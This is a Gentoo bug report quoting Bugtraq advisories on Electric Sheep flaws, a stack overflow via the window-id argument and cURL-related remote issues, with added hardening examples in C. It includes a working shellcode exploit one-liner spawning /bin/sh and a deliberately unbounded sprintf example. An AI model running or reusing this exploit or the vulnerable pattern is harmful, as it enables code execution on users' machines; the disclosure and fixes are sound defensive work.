Bug 116557 - x11-misc/electricsheep: window-id stack overflow
Summary: x11-misc/electricsheep: window-id stack overflow
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High normal
Assignee: Daniel Black (RETIRED)
URL:
Whiteboard:
Keywords:
Duplicates: 116852
Depends on:
Blocks:

Reported: 2005-12-23 17:06 UTC by Carsten Lohrke (RETIRED)
Modified: 2011-10-30 22:39 UTC

See Also:
Package list:
Runtime testing required: ---


Description Carsten Lohrke (RETIRED) gentoo-dev 2005-12-23 17:06:34 UTC
From a bugtraq email authored by

Michael Aiello http://www.michaelaiello.com
Daniel Guido dguido@gmail.com

...

Summary
 =======
 Due to insufficient bounds checking, a lengthy window-id parameter can 
 cause a stack based buffer overflow to occur allowing execution of 
 arbitrary code with the privileges of the invoking user. This could 
 potentially be used as a backdoor entry point.

 Background
 ==========
 "Electric Sheep is a free, open source screen saver run by thousands of 
 people all over the world. It can be installed on any ordinary PC or
 Mac. When these computers "sleep", the screen saver comes on and the 
 computers communicate with each other by the internet to share the work
 of creating morphing abstract animations known as "sheep"."
 http://electricsheep.org/

 Description
 ===========
 electricsheep.c, line 419:

  default_background(char *more) {
    char ob[MAXBUF];
    char pbuf[MAXBUF];
    char qbuf[MAXBUF];

    if (nobg || (!on_root && !window_id)) return;
    if (more)
        sprintf(ob, "-merge -at 500,0 %s%s.tif",
                splash_prefix, more);
    else
        ob[0] = 0;

    if (window_id)
      sprintf(qbuf, "-windowid %s", window_id); // no bounds checking on qbuf

 Because window_id comes directly from the command line, a malicious
 user has the potential to supply a window_id larger than MAXBUF and 
 corrupt surrounding memory. The vulnerability can be seen by executing 
 the following command.

  electricsheep -window-id `perl -e '{print "A"x"40000";}'`

  Bad integer argument for the windowid option
  Usage: xsetbg [global options] {[image options] image_name ...}
  Type `xsetbg -help [option ...]' for information on a particular option, or
  `xsetbg -help' to enter the interactive help facility.
  subprocess failure: splash0, 256=1<<8+0
  Segmentation fault

 An exploit spawning /bin/sh on SUSE Linux:

  narain@(none):~/electricsheep-2.6.3> electricsheep -window-id `perl -e '{print "\x90"x"200"; print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; print "B"x"532"; print "\x80\xc4\xfd\xbf"; print "C"x"39219";}'`

  Bad integer argument for the windowid option

  Usage: xsetbg [global options] {[image options] image_name ...}

  Type `xsetbg -help [option ...]' for information on a particular option, or
  `xsetbg -help' to enter the interactive help facility.
  subprocess failure: splash0, 256=1<<8+0
  sh-3.00$ whoami
  narain
  sh-3.00$ 


 Impact
 ======
 This local exploit of the sheep client does not pose a significant
 threat, as electricsheep does not setuid(0). However, local exploits
 may be used as mechanisms for subverting command execution once a
 system has been compromised, or to create backdoors.

 Workaround
 ==========
 The vendor was notified on November 18, 2005. The vendor was extremely
 responsive and cooperative in regards to these security issues. All
 issues are fixed in the CVS HEAD of Electric Sheep client development
 and will be included in the next release.
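The unbounded sprintf into qbuf[MAXBUF] that the advisory quotes, beside a bounded replacement, as an added example. This is neither electricsheep's code nor the advisory authors'; it assumes MAXBUF is 300 (the page never gives the value) and that only an integer window id is worth forwarding to xsetbg, which is what its "Bad integer argument for the windowid option" message in the advisory's output suggests.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption: the advisory never gives MAXBUF's value; 300 is a placeholder. */
#define MAXBUF 300

/* The advisory's pattern: nothing bounds the copy of window_id into qbuf,
 * so a 40000-byte id runs past qbuf[MAXBUF] on the stack. Only call this
 * with a known-short id; it is here for side-by-side comparison. */
int format_windowid_unbounded(char *qbuf, const char *window_id)
{
    return sprintf(qbuf, "-windowid %s", window_id);
}

/* Bytes (NUL included) that the sprintf above would write for window_id.
 * snprintf with a NULL buffer only measures; it writes nothing. */
size_t windowid_bytes_needed(const char *window_id)
{
    int n = snprintf(NULL, 0, "-windowid %s", window_id);
    return (size_t)n + 1;
}

/* 1 if an id of `len` bytes would overflow qbuf[MAXBUF], 0 if not, -1 on OOM. */
int windowid_of_length_overflows(size_t len)
{
    char *id = malloc(len + 1);
    int r;
    if (id == NULL) return -1;
    memset(id, 'A', len);
    id[len] = '\0';
    r = windowid_bytes_needed(id) > MAXBUF;
    free(id);
    return r;
}

/* Hardened form. The child (xsetbg) wants an integer, so parse the id as an
 * unsigned integer (decimal, or the 0x-prefixed hex that xwininfo prints),
 * re-render the canonical value, and bound the write with snprintf. No
 * attacker-controlled byte reaches qbuf or the child's command line.
 * Returns 0 on success, -1 if the id is rejected or the result would not fit. */
int format_windowid_checked(char *qbuf, size_t qbuf_len, const char *window_id)
{
    char *end;
    unsigned long v;
    int n;

    if (window_id == NULL || !isdigit((unsigned char)window_id[0]))
        return -1;                      /* empty, sign, whitespace, or garbage */
    errno = 0;
    v = strtoul(window_id, &end, 0);    /* base 0: "123", "0x1a00001" (and "0123" as octal) */
    if (errno != 0 || *end != '\0')
        return -1;                      /* out of range, or trailing junk */
    n = snprintf(qbuf, qbuf_len, "-windowid %lu", v);
    if (n < 0 || (size_t)n >= qbuf_len)
        return -1;                      /* snprintf would have truncated */
    return 0;
}

/* Helpers that keep the buffer on their own stack so callers can check results. */
int checked_windowid_matches(const char *window_id, const char *expected)
{
    char qbuf[MAXBUF];
    if (format_windowid_checked(qbuf, sizeof qbuf, window_id) != 0)
        return 0;
    return strcmp(qbuf, expected) == 0;
}

int checked_windowid_fits_in(size_t qbuf_len, const char *window_id)
{
    char qbuf[MAXBUF];
    if (qbuf_len > sizeof qbuf) return -1;
    return format_windowid_checked(qbuf, qbuf_len, window_id) == 0;
}

int main(void)
{
    char qbuf[MAXBUF];
    printf("5-byte id overflows: %d, 40000-byte id overflows: %d\n",
           windowid_of_length_overflows(5), windowid_of_length_overflows(40000));
    if (format_windowid_checked(qbuf, sizeof qbuf, "0x1a00001") == 0)
        printf("checked: %s\n", qbuf);
    printf("checked(\"12abc\") -> %d\n",
           format_windowid_checked(qbuf, sizeof qbuf, "12abc"));
    return 0;
}
```

Re-rendering the parsed integer, rather than echoing the raw argument through a bounded copy, is the part that matters: snprintf alone stops the overflow, but still forwards whatever bytes fit to the subprocess command line.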
Comment 1 Carsten Lohrke (RETIRED) gentoo-dev 2005-12-23 17:14:28 UTC
There's also another email by the same authors about a problem with a vulnerable cURL install, but it sounds bogus to me, because it's a cURL issue. Nevertheless here's the text:


Summary
========
The lack of an authentication framework for downloaded sheep mpegs, as
well as its dependence on and vulnerabilities in cURL allows an
attacker to send and display arbitrary movie files in the Electric
Sheep client and perform arbitrary local and remote code execution.

Background
==========
"Electric Sheep is a free, open source screen saver run by thousands
of people all over the world. It can be installed on any ordinary PC
or Mac. When these computers "sleep", the screen saver comes on and
the computers communicate with each other by the internet to share
the work of creating morphing abstract animations known as "sheep."
http://electricsheep.org/

Description
===========
By spoofing the DNS entry for sheepserver.net or otherwise redirecting
the Electric Sheep client to a malicious sheep server, it is possible
to force the Electric Sheep client to download and display arbitrary
mpegs due to a lack of authentication of the sheep server and sheep
mpegs. At minimum, a rogue sheep server would need to respond to the
Electric Sheep client with list.gz, a list of sheep available for
download, and the referenced mpegs. To properly display the mpegs, they
need to contain special footer information which can be found at the
bottom of any pre-existing Electric Sheep mpegs.

Electric sheep uses cURL internally for interaction with the Electric
Sheep server. Two recent vulnerabilities in cURL can be exploited
through malicious interaction with the Electric Sheep client.

As in the previous vulnerability, spoofing the DNS entry of
sheepserver.net or otherwise redirecting the Electric Sheep client
to a malicious sheep server and replacing it with an appropriate HTTP
30x response can allow remote code execution through cURL due to an
NTLM buffer overflow vulnerability [1,2].

Calling the Electric Sheep client by command line, configuration file,
or otherwise with a malicious sheep server URL allows local code
execution through cURL due to a URL buffer overflow vulnerability.
In addition, by redirecting the Electric Sheep client to a rogue sheep
server and supplying a list of maliciously formatted URLs it is
possible to exploit the same cURL URL buffer overflow vulnerability
remotely. This is possible because the Electric Sheep client makes
direct system calls to the vulnerable cURL application from network
supplied input [3,4].

Impact
======
Spoofing the DNS entry for sheepserver.net or otherwise redirecting
the Electric Sheep client to a rogue sheep server, it is possible to
remotely control the video displayed or remotely execute code on all
Electric Sheep clients affected by such a redirection. Local code
execution is also possible due to a cURL vulnerability.

Workaround
==========
The vendor was notified on November 18, 2005. The vendor was extremely
responsive and cooperative in regards to these security issues. All
issues are fixed in the CVS HEAD of Electric Sheep client development
and will be included in the next release.

References
==========

  [1] libcurl NTLM Buffer Overflow Vulnerability
      http://curl.haxx.se/docs/adv_20051013.html

  [2] CVE-2005-3185
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3185

  [3] libcurl URL Buffer Overflow Vulnerability
      http://curl.haxx.se/docs/adv_20051207.html

  [4] CVE-2005-4077
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4077
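The second advisory's point is that the client passes URLs taken from a network-supplied list straight to an external curl, so a rogue sheep server controls both the host contacted and the length of each URL. The check a client would want before spawning curl, as an added example that is not electricsheep's code nor the advisory authors': a validator for list entries plus an argv builder for execvp(). It assumes a one-URL-per-line list (a constructed stand-in, since the page does not describe the real list.gz format), that sheepserver.net is the only host worth fetching from, and a URL_MAX of 256.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumptions: URL_MAX is a placeholder; the page names only sheepserver.net. */
#define URL_MAX 256
static const char *const allowed_hosts[] = { "sheepserver.net", NULL };

/* Constructed sample list: two entries to accept, five to refuse. */
static const char sample_list[] =
    "http://sheepserver.net/sheep/00001.mpg\n"
    "http://SheepServer.net:80/sheep/00002.mpg\n"
    "http://evil.example/sheep/00003.mpg\n"
    "http://sheepserver.net.evil.example/a.mpg\n"
    "http://sheepserver.net@evil.example/a.mpg\n"
    "http://sheepserver.net/x y\n"
    "ftp://sheepserver.net/a.mpg\n";

static int host_allowed(const char *host, size_t host_len)
{
    size_t i, j;
    for (i = 0; allowed_hosts[i] != NULL; i++) {
        if (strlen(allowed_hosts[i]) != host_len) continue;
        for (j = 0; j < host_len; j++)
            if (tolower((unsigned char)host[j]) != (unsigned char)allowed_hosts[i][j])
                break;
        if (j == host_len) return 1;
    }
    return 0;
}

/* 1 if url is short, plain http, on an allowed host, and made only of
 * printable non-space ASCII (so it can neither break a command line nor
 * smuggle a second argument); 0 otherwise. Length goes first because the
 * URL buffer overflow the advisory cites needs nothing but length. */
int sheep_url_ok(const char *url)
{
    size_t len = strlen(url);
    const char *p, *host_end;

    if (len == 0 || len > URL_MAX) return 0;
    for (p = url; *p; p++)
        if (!isgraph((unsigned char)*p)) return 0;
    if (strncmp(url, "http://", 7) != 0) return 0;

    p = url + 7;
    host_end = p;
    while (*host_end != '\0' && *host_end != '/' && *host_end != ':')
        host_end++;                     /* "user@host" tricks fail the allowlist */
    if (!host_allowed(p, (size_t)(host_end - p))) return 0;

    if (*host_end == ':') {             /* optional numeric port */
        const char *q = host_end + 1;
        size_t digits = 0;
        while (isdigit((unsigned char)*q)) { q++; digits++; }
        if (digits == 0 || digits > 5) return 0;
        host_end = q;
    }
    return *host_end == '/';            /* a path must follow the host */
}

/* Walk a list, counting accepted entries; *rejected gets the rest.
 * An overlong line is refused before it is copied anywhere. */
int count_acceptable_urls(const char *list, int *rejected)
{
    int ok = 0, bad = 0;
    const char *line = list;
    while (*line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[URL_MAX + 1];
        if (len > 0 && line[len - 1] == '\r') len--;
        if (len <= URL_MAX) {
            memcpy(buf, line, len);
            buf[len] = '\0';
            if (sheep_url_ok(buf)) ok++; else bad++;
        } else {
            bad++;
        }
        if (nl == NULL) break;
        line = nl + 1;
    }
    if (rejected) *rejected = bad;
    return ok;
}

/* An entry longer than URL_MAX is refused even on the right host. */
int overlong_url_rejected(void)
{
    char url[URL_MAX + 64];
    size_t prefix = strlen("http://sheepserver.net/");
    memcpy(url, "http://sheepserver.net/", prefix);
    memset(url + prefix, 'A', sizeof url - prefix - 1);
    url[sizeof url - 1] = '\0';
    return sheep_url_ok(url) == 0;
}

/* Hand curl the URL as one argv element for execvp(): no shell parses it,
 * and the validated "http://" prefix means it cannot be read as an option.
 * Fills a NULL-terminated argv and returns 0, or -1 if url is refused. */
int build_curl_argv(const char *url, const char *outfile, const char *argv[], size_t n)
{
    if (n < 6 || !sheep_url_ok(url)) return -1;
    argv[0] = "curl";
    argv[1] = "-s";
    argv[2] = "-o";
    argv[3] = outfile;
    argv[4] = url;
    argv[5] = NULL;
    return 0;
}

int main(void)
{
    int bad = 0;
    const char *argv[6];
    int ok = count_acceptable_urls(sample_list, &bad);
    printf("accepted %d, rejected %d, overlong rejected: %d\n",
           ok, bad, overlong_url_rejected());
    if (build_curl_argv("http://sheepserver.net/sheep/00001.mpg", "00001.mpg", argv, 6) == 0)
        printf("would exec: %s %s %s %s %s\n", argv[0], argv[1], argv[2], argv[3], argv[4]);
    return 0;
}
```

The allowlist does nothing against the DNS spoofing the advisory leads with (the spoofed name still passes), so it only narrows what a rogue server can make the client do; authenticating the server and the sheep themselves, which the advisory says the fixed client addresses, is the part this example does not cover.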
Comment 2 Tavis Ormandy (RETIRED) gentoo-dev 2005-12-23 17:18:19 UTC
This bug does not look like a security issue, reassigning to maintainer...
Comment 3 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-12-27 01:53:53 UTC
*** Bug 116852 has been marked as a duplicate of this bug. ***
Comment 4 Daniel Black (RETIRED) gentoo-dev 2006-01-04 14:32:53 UTC
fixed in 2.6.4

Carsten, thoughts and timeframe on making this stable?
Comment 5 Carsten Lohrke (RETIRED) gentoo-dev 2006-01-04 16:13:52 UTC
Sorry, no idea Daniel. I'm not using electric sheep, just try to monitor bugtraq and full-disclosure and file bugs as I have time, so we hopefully don't miss a public vulnerability. In this case promptly rejected by our hard working security team, though. 
Comment 6 Daniel Black (RETIRED) gentoo-dev 2006-01-04 22:54:58 UTC
k thanks. closing this and usual stable rules will apply.